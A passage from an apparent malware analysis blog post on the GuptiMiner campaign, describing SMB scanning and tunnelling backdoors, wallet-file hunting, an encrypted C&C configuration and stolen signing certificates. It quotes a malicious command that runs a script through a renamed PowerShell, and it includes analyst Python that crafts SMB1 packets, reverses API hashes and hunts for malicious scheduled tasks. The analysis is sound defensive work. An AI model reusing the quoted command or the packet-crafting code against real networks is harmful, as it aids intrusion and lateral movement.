  1216. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-41.png"><img loading="lazy" decoding="async" width="603" height="93" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-41.png" alt="" class="wp-image-8462" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-41.png 603w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-41-300x46.png 300w" sizes="(max-width: 603px) 100vw, 603px" /></a><figcaption class="wp-element-caption"><em>The deployment happens in March, June, September, and December</em></figcaption></figure></div>
  1217.  
  1218.  
  1219. <h2 class="wp-block-heading">Stage 4 – Backdoor&nbsp;</h2>
  1220.  
  1221.  
  1222.  
  1223. <p>Since <strong>no one</strong> who puts such an effort into a malware campaign deploys <em>just</em> coinminers on the infected devices, let’s dig deeper into additional sets of GuptiMiner’s functionalities – deploying two types of backdoors on the infected devices.</p>
  1224.  
  1225.  
  1226.  
  1227. <h3 class="wp-block-heading">PuTTY Backdoor&nbsp;</h3>
  1228.  
  1229.  
  1230.  
  1231. <p><code><em>07beca60c0a50520b8dbc0b8cc2d56614dd48fef0466f846a0a03afbfc42349d</em><br><em>(2021-03-01 10:31:33 UTC)</em></code><br><em><code>E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb</code></em></p>
  1232.  
  1233.  
  1234.  
  1235. <p>One of the backdoors deployed by GuptiMiner is based on a custom build of PuTTY Link (<code>plink</code>). This build contains an enhancement for local SMB network scanning, and it ultimately enables lateral movement over the network, potentially exploiting <code>Windows 7</code> and <code>Windows Server 2008</code> machines by tunneling SMB traffic through the victim’s infected device.</p>
  1236.  
  1237.  
  1238.  
  1239. <h4 class="wp-block-heading">Local SMB Scanning&nbsp;</h4>
  1240.  
  1241.  
  1242.  
  1243. <p>First, the plink binary is injected into the <code>netsh.exe</code> process by Puppeteer using the <a href="#deploy-per-quarter">Deploy per-quarter</a> approach. After a successful injection, the malware discovers local IP ranges by reading the IP tables of the victim’s device and adds them to local and global IP range lists.</p>
  1244.  
  1245.  
  1246.  
  1247. <p>With that, the malware continues with the local SMB scanning over the obtained IP ranges: <code>xx.yy.zz.1-254</code>. When a device supporting SMB is discovered, it is saved in a dedicated list. The same goes for IPs that don’t support SMB, which are effectively deny-listed from future actions. This deny list is saved in specific registry values named <code>Sem</code> and <code>Init</code> under this key:<br><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CMF\Class</code><br>where <code>Init</code> contains the found IP addresses and <code>Sem</code> contains their total count.</p>
  1248.  
  1249.  
  1250.  
  1251. <p>Several conditions govern when such a scan is performed. For example, the scan can only happen when it is a day of the week <code>(!)</code>, during the per-quarter deployment, and only between 12:00 and 18:00. Here, we denote by <code>(!)</code> a <em>unique</em> coding artefact in the condition, since checking the day of the week is unnecessary (it is always true).</p>
  1252.  
  1253.  
  1254. <div class="wp-block-image">
  1255. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42.png"><img loading="lazy" decoding="async" width="1477" height="217" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42.png" alt="" class="wp-image-8463" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42.png 1477w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42-300x44.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42-1024x150.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42-768x113.png 768w" sizes="(max-width: 1477px) 100vw, 1477px" /></a><figcaption class="wp-element-caption"><em>Questionable conditioning for SMB scanning</em></figcaption></figure></div>
  1256.  
  1257.  
  1258. <p>Finally, the malware also creates a new registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\RNG\FFFF</code> three hours after a successful scan. This serves as a flag that scanning has finished and no further scanning is needed.</p>
  1259.  
  1260.  
  1261.  
  1262. <p>An even more interesting datetime-related bug can be seen in the condition for the removal of the <code>RNG\FFFF</code> registry key. The removal indicates that the malware can perform another SMB scan after a certain period of time.</p>
  1263.  
  1264.  
  1265.  
  1266. <p>As we can see in the figure below, the malware converts the write time of the registry key and the current system time with the <code>SystemTimeToVariantTime</code> API function and subtracts them. The result of the subtraction is a floating-point number whose integral part is the number of days.</p>
  1267.  
  1268.  
  1269.  
  1270. <p>Furthermore, the malware uses the constant <code>60*60*60*24=5184000</code> seconds (60 days) in the condition for the registry key removal. However, the condition compares a <code>VariantTime</code> difference (in days) with a value in seconds. Thus, the backdoor can activate every <code>51.84</code> days instead of the (intended?) 60 days. A true blessing in disguise.</p>
  1271.  
  1272.  
  1273. <div class="wp-block-image">
  1274. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-43.png"><img loading="lazy" decoding="async" width="779" height="416" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-43.png" alt="" class="wp-image-8464" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-43.png 779w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-43-300x160.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-43-768x410.png 768w" sizes="(max-width: 779px) 100vw, 779px" /></a><figcaption class="wp-element-caption"><em>Removal of <code>RNG\FFFF</code> key, deploying the backdoor after <code>51.84</code> days</em></figcaption></figure></div>
  1275.  
  1276.  
  1277. <h4 class="wp-block-heading">Lateral Movement Over SMB Traffic&nbsp;</h4>
  1278.  
  1279.  
  1280.  
  1281. <p>After the local SMB scan is finished, the malware checks from the received SMB packet results whether any of the IP addresses that responded are running <code>Windows 7</code> or <code>Windows Server 2008</code>. If any such system is found on the local network, the malware adds its IP address to a list of potential targets.</p>
  1282.  
  1283.  
  1284.  
  1285. <p>Furthermore, GuptiMiner executes plink’s legacy <code>main()</code> function with artificial parameters. This creates a tunnel on port <code>445</code> between the attacker’s server <code>gesucht[.]net</code> and the victim’s device.</p>
  1286.  
  1287.  
  1288. <div class="wp-block-image">
  1289. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-45.png"><img loading="lazy" decoding="async" width="612" height="545" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-45.png" alt="" class="wp-image-8466" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-45.png 612w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-45-300x267.png 300w" sizes="(max-width: 612px) 100vw, 612px" /></a><figcaption class="wp-element-caption"><em>Parameters used for <code>plink main()</code> function</em></figcaption></figure></div>
  1290.  
  1291.  
  1292. <p>This tunnel is used for sending SMB traffic through the victim’s device to the IP addresses from the target list, enabling lateral movement over the local network.&nbsp;</p>
  1293.  
  1294.  
  1295.  
  1296. <p>Note that this version of Puppeteer, which deploys this backdoor, is from 2021. We also mentioned that only <code>Windows 7</code> and <code>Windows Server 2008</code> are targeted, which are rather old. We think this might be because the attackers try to deploy an exploit for possible vulnerabilities on these old systems.</p>
  1297.  
  1298.  
  1299.  
  1300. <p>To orchestrate the SMB communication, the backdoor hand-crafts SMB packets on the fly, modifying the <code>TID</code> and <code>UID</code> fields to reflect the previous SMB communication. As shown in the decompiled code below, SMB <code>packet 4</code>, which is crafted and sent by the malware, contains both the <code>TID</code> and <code>UID</code> taken from the responses of the local network device.</p>
  1301.  
  1302.  
  1303. <div class="wp-block-image">
  1304. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46.png"><img loading="lazy" decoding="async" width="1065" height="572" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46.png" alt="" class="wp-image-8467" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46.png 1065w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46-300x161.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46-1024x550.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46-768x412.png 768w" sizes="(max-width: 1065px) 100vw, 1065px" /></a><figcaption class="wp-element-caption"><em>The backdoor hand-crafts SMB packets on the fly</em></figcaption></figure></div>
  1305.  
  1306.  
  1307. <p>Below is an example of how the SMB packets sent by the malware look in Wireshark. After the TCP connection is established, the malware attempts an anonymous login (a null session), connects to the <code>\IPC$</code> share and then opens a named pipe on it.</p>
  1308.  
  1309.  
  1310. <div class="wp-block-image">
  1311. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-47.png"><img loading="lazy" decoding="async" width="1007" height="88" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-47.png" alt="" class="wp-image-8468" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-47.png 1007w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-47-300x26.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-47-768x67.png 768w" sizes="(max-width: 1007px) 100vw, 1007px" /></a><figcaption class="wp-element-caption"><em>SMB traffic captured by Wireshark</em></figcaption></figure></div>
  1312.  
  1313.  
  1314. <p>Interested readers can find the captured PCAP on our <a href="https://github.com/avast/ioc/blob/master/GuptiMiner/extras/PCAP/smb_backdoor_networking.pcap" target="_blank" rel="noreferrer noopener">GitHub</a>.</p>
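<p>As an added illustration (our own analyst code, not the backdoor's), the following Python snippet parses SMB1 headers and shows how a client has to carry the server-assigned <code>UID</code> and <code>TID</code> into every later request, which is exactly what the decompiled routine above reproduces by hand. The 32-byte SMB1 header layout follows the protocol; the NetBIOS session framing, the flag and PID values and the two server replies fed in by <code>demo()</code> are constructed for the example rather than taken from the PCAP.</p>

```python
import struct

# SMB1 header (32 bytes, little-endian): Protocol, Command, Status, Flags,
# Flags2, PIDHigh, SecurityFeatures, Reserved, TID, PIDLow, UID, MID.
SMB1_HDR = "<4sBIBHH8sHHHHH"
SMB1_MAGIC = b"\xffSMB"
SMB_COM_SESSION_SETUP_ANDX = 0x73   # reply carries the server-assigned UID
SMB_COM_TREE_CONNECT_ANDX = 0x75    # reply carries the server-assigned TID
SMB_COM_NT_CREATE_ANDX = 0xA2       # e.g. opening a named pipe on IPC$
FLAGS_REPLY = 0x80                  # Flags bit set on server responses


def parse_smb1(data: bytes) -> dict:
    """Strip the 4-byte NetBIOS session header and decode the SMB1 header."""
    if len(data) < 36 or data[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    length = int.from_bytes(data[1:4], "big")
    body = data[4:4 + length]
    if body[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB1 message")
    f = struct.unpack(SMB1_HDR, body[:32])
    return {"command": f[1], "status": f[2], "flags": f[3], "flags2": f[4],
            "tid": f[8], "pid": f[9], "uid": f[10], "mid": f[11],
            "payload": body[32:]}


def build_smb1(command: int, tid: int, uid: int, mid: int, payload: bytes = b"",
               flags: int = 0x18, status: int = 0) -> bytes:
    """Build an SMB1 message with explicit TID/UID behind a NetBIOS header.

    Flags 0x18 / Flags2 0xC807 and PID 0xFEFF are typical client values and
    are assumptions for this example, not values taken from the sample.
    """
    hdr = struct.pack(SMB1_HDR, SMB1_MAGIC, command, status, flags, 0xC807, 0,
                      b"\x00" * 8, 0, tid, 0xFEFF, uid, mid)
    body = hdr + payload
    return b"\x00" + len(body).to_bytes(3, "big") + body


class Smb1Session:
    """Tracks the UID and TID the server hands back, as the backdoor does."""

    def __init__(self) -> None:
        self.uid = 0
        self.tid = 0
        self.mid = 0

    def observe_response(self, data: bytes) -> None:
        """Record IDs from successful replies; failed ones are ignored."""
        pkt = parse_smb1(data)
        if not (pkt["flags"] & FLAGS_REPLY) or pkt["status"] != 0:
            return
        if pkt["command"] == SMB_COM_SESSION_SETUP_ANDX:
            self.uid = pkt["uid"]
        elif pkt["command"] == SMB_COM_TREE_CONNECT_ANDX:
            self.tid = pkt["tid"]

    def next_request(self, command: int, payload: bytes = b"") -> bytes:
        """Craft the next request, echoing the server-assigned TID and UID."""
        self.mid += 1
        return build_smb1(command, self.tid, self.uid, self.mid, payload)


def demo() -> dict:
    """Replay two constructed server replies, then craft the follow-up request."""
    sess = Smb1Session()
    # Constructed: Session Setup reply accepting the anonymous login, UID 0x0801.
    sess.observe_response(build_smb1(SMB_COM_SESSION_SETUP_ANDX, 0, 0x0801, 1,
                                     flags=0x18 | FLAGS_REPLY))
    # Constructed: Tree Connect reply for \\target\IPC$, TID 0x0800.
    sess.observe_response(build_smb1(SMB_COM_TREE_CONNECT_ANDX, 0x0800, 0x0801, 2,
                                     flags=0x18 | FLAGS_REPLY))
    # The named-pipe open now carries both IDs, like the malware's packet 4.
    return parse_smb1(sess.next_request(SMB_COM_NT_CREATE_ANDX, b"\x18\xff\x00"))
```

<p>Against a real capture, <code>Smb1Session.observe_response()</code> would be fed each server reply from the PCAP linked above; the request built in <code>demo()</code> corresponds to the named pipe open that follows the <code>\IPC$</code> tree connect. Only successful replies (<code>Status == 0</code>) update the session, so a rejected anonymous login leaves <code>uid</code> at zero and the follow-up request is identifiable as such.</p>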
  1315.  
  1316.  
  1317.  
  1318. <h3 class="wp-block-heading" id="modular-backdoor">Modular Backdoor&nbsp;</h3>
  1319.  
  1320.  
  1321.  
  1322. <p><code><em>f0ccfcb5d49d08e9e66b67bb3fedc476fdf5476a432306e78ddaaba4f8e3bbc4</em><br><em>(2023-10-10 15:08:36 UTC)</em>&nbsp;</code></p>
  1323.  
  1324.  
  1325.  
  1326. <p>Another backdoor we found being distributed by Puppeteer during our research is a modular backdoor targeting large corporate networks. It works in two phases: first, the malware scans the device for locally stored private keys and cryptocurrency wallets; second, it injects the modular backdoor itself, in the form of shellcode, into another process.</p>
  1327.  
  1328.  
  1329.  
  1330. <h4 class="wp-block-heading">Checks on Private Keys, Wallets, and Corporate Network</h4>
  1331.  
  1332.  
  1333.  
  1334. <p>This part of the backdoor scans the system for private keys and wallet files by searching for <code>.pvk</code> and <code>.wallet</code> files in these locations:</p>
  1335.  
  1336.  
  1337.  
  1338. <ul>
  1339. <li><code>C:\Users\*&nbsp;</code></li>
  1340.  
  1341.  
  1342.  
  1343. <li><code>D:\*&nbsp;</code></li>
  1344.  
  1345.  
  1346.  
  1347. <li><code>E:\*&nbsp;</code></li>
  1348.  
  1349.  
  1350.  
  1351. <li><code>F:\*&nbsp;</code></li>
  1352.  
  1353.  
  1354.  
  1355. <li><code>G:\*&nbsp;</code></li>
  1356. </ul>
  1357.  
  1358.  
  1359.  
  1360. <p>If such a file is found, its path is logged to a newly created file, <code>C:\Users\Public\Ca.txt</code>. Interestingly, the code we have available does not process this file any further. We assume its contents are collected later, once additional modules are downloaded by the backdoor.</p>
  1361.  
  1362.  
  1363.  
  1364. <p>The fact that the scan has been performed is recorded by creating the registry key:<br><code>HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\DECLAG</code></p>
  1365.  
  1366.  
  1367.  
  1368. <p>If any private keys or wallets were found, or the malware is running in a large corporate environment, it proceeds to inject the backdoor, in the form of shellcode, into an <code>mmc.exe</code> process.</p>
  1369.  
  1370.  
  1371.  
  1372. <p>The size of the corporate environment is estimated with the same approach as in Puppeteer’s <a href="#backdoor-setup">backdoor setup</a>, only at a larger scale: here, the malware compares the length of the returned list of computers in the domain against 200,000 characters. To recapitulate, the output of the <code>net group</code> command uses 25 characters per domain-joined computer plus a newline (<code>CR+LF</code>) after every three computers.</p>
  1373.  
  1374.  
  1375. <div class="wp-block-image">
  1376. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png"><img loading="lazy" decoding="async" width="502" height="80" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png" alt="" class="wp-image-8460" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png 502w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39-300x48.png 300w" sizes="(max-width: 502px) 100vw, 502px" /></a><figcaption class="wp-element-caption"><em>Example output of <code>net group</code> command</em></figcaption></figure></div>
  1377.  
  1378.  
  1379. <p>This effectively means that the network in which the malware operates must have at least 7781 computers joined to the domain, which is a very large number.</p>
  1380.  
  1381.  
  1382.  
  1383. <h4 class="wp-block-heading">Backdoor</h4>
  1384.  
  1385.  
  1386.  
  1387. <p><code><em>8446d4fc1310b31238f9a610cd25ea832925a25e758b9a41eea66f998163bb34</em>&nbsp;</code></p>
  1388.  
  1389.  
  1390.  
  1391. <p>This shellcode is a completely different piece of code from anything we have seen so far in the GuptiMiner campaign. It is designed to be multi-modular, with the ability to add further modules into the execution flow. Only a network communication module, however, is hardcoded and available by default; its hash is <code>74d7f1af69fb706e87ff0116b8e4fa3a9b87275505e2ee7a32a8628a2d066549 (<em>2022-12-19 07:31:39 UTC</em>)</code>.</p>
  1392.  
  1393.  
  1394.  
  1395. <p>After injection, the backdoor decrypts a hardcoded configuration and the hardcoded network module using RC4. The RC4 key is hardcoded too and sits directly in the shellcode.</p>
  1396.  
  1397.  
  1398.  
  1399. <p>The configuration contains, among other things, which server to contact, which ports to use, and the delays to insert between commands and requests. In this configuration the C&amp;C domain is <code>www.righttrak[.]net:443</code>, with the IP address <code>185.248.160[.]141</code>.</p>
  1400.  
  1401.  
  1402. <div class="wp-block-image">
  1403. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-50.png"><img loading="lazy" decoding="async" width="642" height="235" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-50.png" alt="" class="wp-image-8471" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-50.png 642w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-50-300x110.png 300w" sizes="(max-width: 642px) 100vw, 642px" /></a><figcaption class="wp-element-caption"><em>Decrypted network module configuration</em></figcaption></figure></div>
  1404.  
  1405.  
  1406. <p>The network module implements seven commands the attacker can use to instruct the backdoor. The complete list of commands accepted by the network module is in the table below. Note that every module the backdoor can load carries its own command handler of this kind.</p>
  1407.  
  1408.  
  1409.  
  1410. <figure class="wp-block-table"><table><tbody><tr><td><strong>Command</strong>&nbsp;</td><td><strong>Description</strong>&nbsp;</td></tr><tr><td>3.0&nbsp;</td><td>Connect&nbsp;</td></tr><tr><td>3.1&nbsp;</td><td>Read socket&nbsp;</td></tr><tr><td>3.2&nbsp;</td><td>Write socket&nbsp;</td></tr><tr><td>3.3&nbsp;</td><td>Close socket&nbsp;</td></tr><tr><td>4&nbsp;</td><td>Close everything&nbsp;</td></tr><tr><td>6&nbsp;</td><td>Return 1&nbsp;</td></tr><tr><td>12&nbsp;</td><td>Load configuration&nbsp;</td></tr></tbody></table></figure>
  1411.  
  1412.  
  1413.  
  1414. <p>The modules are stored in an encrypted form in the registry, ensuring their persistence:<br><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCB</code></p>
  1415.  
  1416.  
  1417.  
  1418. <p>The backdoor also resolves API functions through import-by-hash obfuscation. The hashing function is a simple algorithm: starting from <code>calculated_hash = 0</code>, it takes each byte of the exported function name, adds 1 to it, multiplies the running <code>calculated_hash</code> by 131 and adds the incremented byte, i.e. <code>calculated_hash = calculated_hash * 131 + (byte + 1)</code>:</p>
  1419.  
  1420.  
  1421.  
  1422. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="850" height="72" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-52.png" alt="" class="wp-image-8473" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-52.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-52-300x25.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-52-768x65.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></figure>
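<p>As an added worked example (our own analyst tooling, not code from the backdoor), the Python below implements the hash exactly as described and builds a reverse lookup so that hash constants found in the shellcode can be turned back into API names. The only assumption beyond the text is that the hash is kept in a 32-bit register with a wrapping multiply, the usual case for this kind of 131-multiplier hash; the export names in <code>SAMPLE_EXPORTS</code> are a constructed list, not the sample’s resolved imports.</p>

```python
def api_hash(name: str, width: int = 32) -> int:
    """hash = hash * 131 + (byte + 1) over each byte of the export name.

    `width` is the register width the wrapping multiply is assumed to use;
    32 bits is an assumption for this example, not stated in the analysis.
    """
    mask = (1 << width) - 1
    h = 0
    for b in name.encode("ascii"):
        h = (h * 131 + (b + 1)) & mask
    return h


def build_lookup(export_names, width: int = 32) -> dict:
    """Precompute hash -> name for a list of export names (e.g. dumped from a
    DLL's export table); on a collision the first name seen is kept."""
    table = {}
    for n in export_names:
        table.setdefault(api_hash(n, width), n)
    return table


def resolve(hashes, export_names, width: int = 32) -> dict:
    """Map hash constants pulled from the shellcode to names, None if unknown."""
    table = build_lookup(export_names, width)
    return {h: table.get(h) for h in hashes}


# Constructed sample: a few kernel32 export names an analyst would normally
# dump with a PE parser. The hash values are computed here, not taken from
# the sample's resolved import table.
SAMPLE_EXPORTS = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc",
                  "CreateThread", "WriteProcessMemory", "CreateRemoteThread"]


def resolve_demo() -> dict:
    """Resolve two known hashes and one that no export in the list matches."""
    wanted = [api_hash("VirtualAlloc"), api_hash("CreateRemoteThread"),
              api_hash("NotAnExport")]
    return resolve(wanted, SAMPLE_EXPORTS)
```

<p>In practice <code>SAMPLE_EXPORTS</code> would be replaced with the export tables of the DLLs the shellcode is likely to resolve (kernel32, ws2_32, advapi32), and <code>setdefault</code> keeps the table deterministic should two exports ever hash to the same value.</p>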
  1423.  
  1424.  
  1425.  
  1426. <p>The server <code>www.righttrak[.]net:443</code> had a valid TLS certificate at the time. Note, for example, the <em>not-at-all-suspicious</em> email address the authors used.</p>
  1427.  
  1428.  
  1429. <div class="wp-block-image">
  1430. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-53.png"><img loading="lazy" decoding="async" width="779" height="933" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-53.png" alt="" class="wp-image-8474" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-53.png 779w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-53-250x300.png 250w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-53-768x920.png 768w" sizes="(max-width: 779px) 100vw, 779px" /></a><figcaption class="wp-element-caption"><em>Certificate on <code>www.righttrak[.]net:443</code> as shown by Censys</em></figcaption></figure></div>
  1431.  
  1432.  
  1433. <h4 class="wp-block-heading" id="other-infection-vectors-modular-backdoor">Other Infection Vectors of Modular Backdoor</h4>
  1434.  
  1435.  
  1436.  
  1437. <p><em><code>af9f1331ac671d241bf62240aa52389059b4071a0635cb9cb58fa78ab942a33b</code></em></p>
  1438.  
  1439.  
  1440.  
  1441. <p>During our research, we also found a 7-Zip SFX executable containing two files:</p>
  1442.  
  1443.  
  1444.  
  1445. <ul>
  1446. <li><code>ms00.dat</code>&nbsp;</li>
  1447.  
  1448.  
  1449.  
  1450. <li><code>notepad.exe</code>&nbsp;</li>
  1451. </ul>
  1452.  
  1453.  
  1454.  
  1455. <p><code>notepad.exe</code> is, despite its name, not the Windows editor but a small binary that decrypts the <code>ms00.dat</code> file using RC4 with the key <code>V#@!1vw32</code>. The decrypted <code>ms00.dat</code> is the same Modular Backdoor as described above.</p>
  1456.  
  1457.  
  1458.  
  1459. <p>However, we have not seen this SFX executable distributed by GuptiMiner, which indicates that the backdoor may be distributed via other infection vectors as well.</p>
  1460.  
  1461.  
  1462.  
  1463. <h2 class="wp-block-heading">Related and Future Research</h2>
  1464.  
  1465.  
  1466.  
  1467. <p>During our research we also observed other, more or less related, samples.</p>
  1468.  
  1469.  
  1470.  
  1471. <h3 class="wp-block-heading">PowerShell Scripts</h3>
  1472.  
  1473.  
  1474.  
  1475. <p>Interestingly, we also found the C&amp;C domain from Puppeteer’s backdoor setup phase in additional scripts that were not distributed by the GuptiMiner operation as we know it. This may be a different kind of attack sharing GuptiMiner’s infrastructure, or possibly a separate campaign altogether. The formatted PowerShell script is shown below:</p>
  1476.  
  1477.  
  1478. <div class="wp-block-image">
  1479. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-54.png"><img loading="lazy" decoding="async" width="850" height="720" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-54.png" alt="" class="wp-image-8475" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-54.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-54-300x254.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-54-768x651.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a><figcaption class="wp-element-caption"><em>A PowerShell script targeting eScan (formatted)</em></figcaption></figure></div>
  1480.  
  1481.  
  1482. <p>In this case, the payload is downloaded from the malicious domain and executed only when an antivirus product is installed whose name is longer than four characters and starts with <code>eS</code>. One does not have to be a Scrabble champion to figure out that the malware authors are targeting the eScan AV once again. The malicious code also runs when the name of the installed AV is shorter than five characters.</p>
  1483.  
  1484.  
  1485.  
  1486. <p>We found this script being run via a scheduled task with the following command:<br><code>"cmd.exe" /c type "\&lt;domain&gt;\SYSVOL\&lt;domain&gt;\scripts\gpon.inc" | "\&lt;domain&gt;\SYSVOL\&lt;domain&gt;\scripts\powAMD64.dat" -nop -</code><br>where <code>powAMD64.dat</code> is a renamed copy of <code>powershell.exe</code> that reads the script from standard input (the trailing <code>-</code>). Both the script and the renamed interpreter are staged on the domain’s <code>SYSVOL</code> share, which implies the attackers had write access to it. The task was stored as <code>C:\Windows\System32\Tasks\ScheduledDefrag</code>.</p>
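<p>The command above has three telltale traits: the interpreter is a renamed PowerShell with a non-executable extension, it takes its script from stdin (the trailing <code>-</code>), and both files are staged on the domain’s SYSVOL share. The Python below, added here as hunting logic of our own rather than anything from the original analysis, scores scheduled task actions on these traits. The task records in <code>SAMPLE_TASKS</code> are constructed; only the first reproduces the quoted command line, with <code>corp.example</code> standing in for the redacted domain.</p>

```python
import ntpath
import re

# Constructed sample of (task path, action command line) pairs, as an EDR or
# a `schtasks /query /fo CSV /v` export would provide them. Only the first
# entry reproduces the command line from the analysis; the others are benign
# examples invented for contrast.
SAMPLE_TASKS = [
    (r"\ScheduledDefrag",
     r'"cmd.exe" /c type "\\corp.example\SYSVOL\corp.example\scripts\gpon.inc" | '
     r'"\\corp.example\SYSVOL\corp.example\scripts\powAMD64.dat" -nop -'),
    (r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     r"%windir%\system32\defrag.exe -c -h -o -$"),
    (r"\LogRotate",
     r'"cmd.exe" /c dir C:\logs | findstr .log'),
    (r"\Backup",
     r'"C:\Program Files\PowerShell\7\pwsh.exe" -File C:\ops\backup.ps1'),
]

PS_SWITCHES = {"-nop", "-noprofile", "-ep", "-executionpolicy", "-w",
               "-windowstyle", "-enc", "-encodedcommand", "-c", "-command"}
EXEC_EXTS = {".exe", ".com", ".bat", ".cmd"}
# \\<domain>\SYSVOL\ (one or two leading backslashes, as the article renders it)
SYSVOL_RE = re.compile(r'\\{1,2}[^\\\s"]+\\SYSVOL\\', re.IGNORECASE)


def split_command(segment: str):
    """Return (executable, args) for one pipeline segment, honouring quotes."""
    segment = segment.strip()
    if segment.startswith('"'):
        end = segment.find('"', 1)
        if end < 0:
            end = len(segment)
        exe, rest = segment[1:end], segment[end + 1:]
    else:
        exe, _, rest = segment.partition(" ")
    return exe, rest.split()


def analyse_action(cmdline: str) -> list:
    """List the traits of the gpon.inc pattern present in one task action."""
    reasons = []
    if SYSVOL_RE.search(cmdline):
        reasons.append("script or binary staged on the domain SYSVOL share")
    segments = [s for s in cmdline.split("|") if s.strip()]
    for seg in segments[1:]:                 # only the consumers of a pipe
        exe, args = split_command(seg)
        ext = ntpath.splitext(exe)[1].lower()
        lowered = {a.lower() for a in args}
        if ext and ext not in EXEC_EXTS:
            reasons.append("pipe target with non-executable extension: "
                           + ntpath.basename(exe))
        if lowered & PS_SWITCHES:
            reasons.append("PowerShell switches passed to the pipe target")
        if args and args[-1] == "-":
            reasons.append("pipe target reads its script from stdin")
    return reasons


def hunt(tasks, min_findings: int = 2) -> dict:
    """Return {task path: reasons} for actions with enough suspicious traits."""
    hits = {}
    for path, cmdline in tasks:
        reasons = analyse_action(cmdline)
        if len(reasons) >= min_findings:
            hits[path] = reasons
    return hits
```

<p>Two or more findings on a single action are enough to surface a task for review; on a live host the same records can be pulled with <code>schtasks /query /fo CSV /v</code> and passed to <code>hunt()</code> unchanged.</p>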
  1487.  
  1488.  
  1489.  
  1490. <h3 class="wp-block-heading">Usage of Stolen Certificates&nbsp;</h3>
  1491.  
  1492.  
  1493.  
  1494. <p>We found two stolen certificates used for signing GuptiMiner payloads. Interestingly, one of them originates in Winnti operations. In this particular sample, the digital signature has the hash:<br><code>529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56</code></p>
  1495.  
  1496.  
  1497.  
  1498. <p>This is the same certificate that <a href="https://securelist.com/winnti-more-than-just-a-game/37029/" target="_blank" rel="noreferrer noopener">Kaspersky</a> described more than 10 years ago. However, we have also seen it used in malware samples other than GuptiMiner, indicating a broader leak.</p>
  1499.  
  1500.  
  1501.  
  1502. <p>A complete list of stolen certificates and their usage can be found in the table below:&nbsp;</p>
  1503.  
  1504.  
  1505.  
